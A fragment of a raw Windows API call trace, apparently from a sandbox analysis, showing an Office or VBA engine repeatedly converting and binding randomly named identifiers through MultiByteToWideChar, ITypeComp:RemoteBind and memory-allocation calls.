ppTypeComp=0x0, pDummy=0x408) returned 0x0 [0060.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a2a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="v4xGOtmY") returned 9 [0060.263] ITypeComp:RemoteBind (in: This=0x87ce668, szName="v4xGOtmY", lHashVal=0x10eab7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x408 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x408) returned 0x0 [0060.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a2a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="v4xGOtmY") returned 9 [0060.263] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="v4xGOtmY", lHashVal=0x10eab7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x408 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x408) returned 0x0 [0060.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a2a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="v4xGOtmY") returned 9 [0060.264] ITypeComp:RemoteBind (in: This=0x87cef08, szName="v4xGOtmY", lHashVal=0x10eab7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x408 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x408) returned 0x0 [0060.264] CRetailMalloc_Alloc () returned 0x87fc500 [0060.264] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371a2a | out: _Dst=0x87fc500) returned 0x0 [0060.265] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20a2a, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_v4xGOtmY") returned 16 [0060.265] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_v4xGOtmY", lHashVal=0x10c240, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.265] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371a2a | out: _Dst=0x34767c) returned 0x0 [0060.265] CRetailMalloc_Free () returned 0x65c0301 [0060.265] ITypeComp:RemoteBind (in: This=0x87ce890, szName="y7g5srP3d", lHashVal=0x108b36, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40a) returned 0x0 [0060.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a52, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="y7g5srP3d") returned 10 [0060.265] ITypeComp:RemoteBind (in: This=0x87ce668, szName="y7g5srP3d", lHashVal=0x108b36, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40a) returned 0x0 [0060.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a52, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="y7g5srP3d") returned 10 [0060.265] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="y7g5srP3d", lHashVal=0x108b36, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40a) returned 0x0 [0060.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a52, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="y7g5srP3d") returned 10 [0060.266] ITypeComp:RemoteBind (in: This=0x87cef08, szName="y7g5srP3d", lHashVal=0x108b36, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40a) returned 0x0 [0060.266] CRetailMalloc_Alloc () returned 0x87504c0 [0060.266] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371a52 | out: _Dst=0x87504c0) returned 0x0 [0060.267] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20a56, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_y7g5srP3d") returned 17 [0060.267] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_y7g5srP3d", lHashVal=0x1084fa, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.267] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371a52 | out: _Dst=0x34767c) returned 0x0 [0060.267] CRetailMalloc_Free () returned 0xcaa0401 [0060.267] ITypeComp:RemoteBind (in: This=0x87ce890, szName="GWhF7SiN", lHashVal=0x10bdea, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40c) returned 0x0 [0060.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a7a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="GWhF7SiN") returned 9 [0060.268] ITypeComp:RemoteBind (in: This=0x87ce668, szName="GWhF7SiN", lHashVal=0x10bdea, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40c) returned 0x0 [0060.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a7a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="GWhF7SiN") returned 9 [0060.268] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="GWhF7SiN", lHashVal=0x10bdea, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40c) returned 0x0 [0060.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371a7a, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="GWhF7SiN") returned 9 [0060.268] ITypeComp:RemoteBind (in: This=0x87cef08, szName="GWhF7SiN", lHashVal=0x10bdea, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40c) returned 0x0 [0060.269] CRetailMalloc_Alloc () returned 0x87fc500 [0060.269] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371a7a | out: _Dst=0x87fc500) returned 0x0 [0060.269] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20a86, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_GWhF7SiN") returned 16 [0060.269] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_GWhF7SiN", lHashVal=0x109573, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.269] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371a7a | out: _Dst=0x34767c) returned 0x0 [0060.270] CRetailMalloc_Free () returned 0x65c0301 [0060.270] ITypeComp:RemoteBind (in: This=0x87ce890, szName="EBrly8sM", lHashVal=0x10ca46, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x40e) returned 0x0 [0060.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aa2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="EBrly8sM") returned 9 [0060.270] ITypeComp:RemoteBind (in: This=0x87ce668, szName="EBrly8sM", lHashVal=0x10ca46, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x40e) returned 0x0 [0060.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aa2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="EBrly8sM") returned 9 [0060.270] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="EBrly8sM", lHashVal=0x10ca46, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x40e) returned 0x0 [0060.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aa2, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="EBrly8sM") returned 9 [0060.271] ITypeComp:RemoteBind (in: This=0x87cef08, szName="EBrly8sM", lHashVal=0x10ca46, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x40e) returned 0x0 [0060.271] CRetailMalloc_Alloc () returned 0x87fc500 [0060.271] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371aa2 | out: _Dst=0x87fc500) returned 0x0 [0060.272] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20ab2, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_EBrly8sM") returned 16 [0060.272] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_EBrly8sM", lHashVal=0x10a1cf, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.272] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x5371aa2 | out: _Dst=0x34767c) returned 0x0 [0060.272] CRetailMalloc_Free () returned 0x65c0301 [0060.272] ITypeComp:RemoteBind (in: This=0x87ce890, szName="N3Xfh", lHashVal=0x102b1b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x410 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x410) returned 0x0 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="N3Xfh") returned 6 [0060.272] ITypeComp:RemoteBind (in: This=0x87ce668, szName="N3Xfh", lHashVal=0x102b1b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x410 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x410) returned 0x0 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="N3Xfh") returned 6 [0060.272] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="N3Xfh", lHashVal=0x102b1b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x410 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x410) returned 0x0 [0060.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="N3Xfh") returned 6 [0060.273] ITypeComp:RemoteBind (in: This=0x87cef08, szName="N3Xfh", lHashVal=0x102b1b, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x410 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x410) returned 0x0 [0060.273] CRetailMalloc_Alloc () returned 0x87fc500 [0060.273] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371aca | out: _Dst=0x87fc500) returned 0x0 [0060.274] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20ade, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_N3Xfh") returned 13 [0060.274] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371aca | out: _Dst=0x34767c) returned 0x0 [0060.274] CRetailMalloc_Free () returned 0x65c0301 [0060.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371aee, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="w4RynF") returned 7 [0060.275] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371aee | out: _Dst=0x87fc500) returned 0x0 [0060.275] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20b0a, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_w4RynF") returned 14 [0060.276] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371aee | out: _Dst=0x34767c) returned 0x0 [0060.276] CRetailMalloc_Free () returned 0x65c0301 [0060.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371b36, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="DYuP7Gtxd") returned 10 [0060.277] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371b36 | out: _Dst=0x87504c0) returned 0x0 [0060.278] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20b36, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_DYuP7Gtxd") returned 17 [0060.278] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371b36 | out: _Dst=0x34767c) returned 0x0 [0060.278] CRetailMalloc_Free () returned 0xcaa0401 [0060.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371b12, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="FxtNA") returned 6 [0060.279] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371b12 | out: _Dst=0x87fc500) returned 0x0 [0060.279] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20b66, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_FxtNA") returned 13 [0060.279] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371b12 | out: _Dst=0x34767c) returned 0x0 [0060.279] CRetailMalloc_Free () returned 0x65c0301 [0060.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371b5e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="mKyvkzCXl") returned 10 [0060.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371b5e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="mKyvkzCXl") returned 10 [0060.280] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371b5e | out: _Dst=0x87504c0) returned 0x0 [0060.281] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20b92, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_mKyvkzCXl") returned 17 [0060.281] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371b5e | out: _Dst=0x34767c) returned 0x0 [0060.281] CRetailMalloc_Free () returned 0xcaa0401 [0060.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371b86, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="iZ1cIiWh8") returned 10 [0060.282] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371b86 | out: _Dst=0x87504c0) returned 0x0 [0060.282] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20bc2, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_iZ1cIiWh8") returned 17 [0060.283] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371b86 | out: _Dst=0x34767c) returned 0x0 [0060.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371bae, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="gxIuE") returned 6 [0060.283] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371bae | out: _Dst=0x87fc500) returned 0x0 [0060.284] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20bf2, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_gxIuE") returned 13 [0060.284] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371bae | out: _Dst=0x34767c) returned 0x0 [0060.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371bf6, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="j79BHF") returned 7 [0060.285] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371bf6 | out: _Dst=0x87fc500) returned 0x0 [0060.285] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c1e, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_j79BHF") returned 14 [0060.286] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371bf6 | out: _Dst=0x34767c) returned 0x0 [0060.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371bd2, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="h68fTX") returned 7 [0060.286] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371bd2 | out: _Dst=0x87fc500) returned 0x0 [0060.287] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c4a, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_h68fTX") returned 14 [0060.287] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371bd2 | out: _Dst=0x34767c) returned 0x0 [0060.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371c1a, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="pq3F2") returned 6 [0060.288] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x6, _Src=0x5371c1a | out: _Dst=0x87fc500) returned 0x0 [0060.288] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20c76, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_pq3F2") returned 13 [0060.288] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x5371c1a | out: _Dst=0x34767c) returned 0x0 [0060.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371c3e, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="LdHUNqDXx") returned 10 [0060.289] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371c3e | out: _Dst=0x87504c0) returned 0x0 [0060.290] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20ca2, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_LdHUNqDXx") returned 17 [0060.290] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371c3e | out: _Dst=0x34767c) returned 0x0 [0060.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371c66, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="LyGHF4") returned 7 [0060.290] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x7, _Src=0x5371c66 | out: _Dst=0x87fc500) returned 0x0 [0060.291] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20cd2, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_LyGHF4") returned 14 [0060.291] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x5371c66 | out: _Dst=0x34767c) returned 0x0 [0060.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371c8a, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="rG52bEJ6x") returned 10 [0060.292] _mbscpy_s (in: _Dst=0x87504c0, _DstSizeInBytes=0xa, _Src=0x5371c8a | out: _Dst=0x87504c0) returned 0x0 [0060.293] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20cfe, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_rG52bEJ6x") returned 17 [0060.293] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x5371c8a | out: _Dst=0x34767c) returned 0x0 [0060.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371cb2, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="fvXHPYt") returned 8 [0060.294] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x8, _Src=0x5371cb2 | out: _Dst=0x87fc500) returned 0x0 [0060.294] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d2e, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_fvXHPYt") returned 15 [0060.294] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x5371cb2 | out: _Dst=0x34767c) returned 0x0 [0060.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5371cd6, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="cLZUlMQ1") returned 9 [0060.295] _mbscpy_s (in: _Dst=0x87fc500, _DstSizeInBytes=0x9, _Src=0x5371cd6 | out: _Dst=0x87fc500) returned 0x0 [0060.296] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d20d5a, cbMultiByte=16, 